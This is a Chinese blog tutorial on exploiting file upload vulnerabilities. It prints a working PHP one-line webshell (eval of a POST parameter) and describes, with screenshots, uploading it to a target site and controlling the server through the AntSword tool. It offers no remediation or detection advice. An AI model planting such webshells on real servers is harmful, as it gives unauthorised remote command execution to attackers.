当前位置:首页 > 每日看点 > 正文内容

文件上传漏洞一般会怎么利用?

卡卷网6个月前 (05-07)每日看点135

准备知识:

一句话木马:<?php @eval($_POST['cmd']); ?>

木马连接工具如:AntSword(蚁剑)

首先把一句话木马写入到php文件中

文件上传漏洞一般会怎么利用?  第1张

然后找到一个上传文件的地方把php文件上传上去,比如:

文件上传漏洞一般会怎么利用?  第2张

上传木马后找到木马上传的位置

文件上传漏洞一般会怎么利用?  第3张

​编辑 把这个复制粘贴到地址栏里的链接后面,如下:

文件上传漏洞一般会怎么利用?  第4张

按回车

文件上传漏洞一般会怎么利用?  第5张

然后复制链接,打开AntSword,点击add

文件上传漏洞一般会怎么利用?  第6张

然后会弹出个框,在shell url地方粘贴刚才地址栏复制的链接,shell pwd地方输入cmd然后按add即可


文件上传漏洞一般会怎么利用?  第7张

双击刚才添加的

文件上传漏洞一般会怎么利用?  第8张

可以看到木马已经连接上了

文件上传漏洞一般会怎么利用?  第9张

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/05/12878.html

分享给朋友:

相关文章

AI普及:让人类更聪明还是更愚蠢?

AI普及:让人类更聪明还是更愚蠢?

人工智能真的会替代人类吗?如果你询问人工智能这个问题,它通常会用“情感模块”作为标准答案来回复你——人工智能因为缺失情感模块,所以暂时无法替代人类的情感、创造力和想象力。是否这意味着,人工智能一旦拥有了情感模块,就会超越正态曲线最中段的大部...

小米14 Pro和Redmi K70Pro怎么选?

小米14 Pro和Redmi K70Pro怎么选?

两款手机都使用了最新的骁龙8Gen3旗舰芯片,性能都是顶级,但是两款手机定位不同,卖点不同,红米K70 Pro定位主打性能的旗舰入门手机,小米14Pro定位旗舰中高端手机。具体根据个人需求与预算来选择:两款手机的相同、相似点:都使用了骁龙8...

为什么大家都说手机性能永远超不过PC?

最新的天玑9400牛逼吧,堪称PC级CPU,测试成绩16W功耗能跑9500分,1.8W能跑3000分,GPU也差不多是这个情况。手机电池一般是4000-5000毫安时,电压3.7V。也就是说,手机正常满载5W功耗下,这个电池能支持运行4个小...

计算机专业不干互联网不热爱技术,还能转行干什么?

转行的思路,无非也就是那几个。我们顺着每个思路,一路捋一遍,基本上,大致可行的方向,也就有了。一、跟对口职业和岗位业务链条相邻的职业和岗位计算机专业如果找到了对口的技术岗位,跟技术工作联系最紧密的岗位是什么?产品经理。当然,大多数产品经理也...

想学习Linux下的ELF文件有什么好书推荐吗?

想学习Linux下的ELF文件有什么好书推荐吗?

大家好,这里是物联网心球。 今天我们来聊聊ELF文件,了解一下Linux如何创建进程以及ELF文件如何转变成Linux进程?1.什么是ELF文件? ELF(Executable and Linkable Format)文...

为什么闲鱼越做越差?

理想的闲鱼:卖家视角:4000块钱买的手机,用了半年不想用了,挂一个3000块,和买家一顿交流,最后2500块成交,我得到了回血,买家得到了便宜;买家视角:想用一台4000块的手机,但是手里只有2500块,来到闲鱼和卖家一顿交流,最后250...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。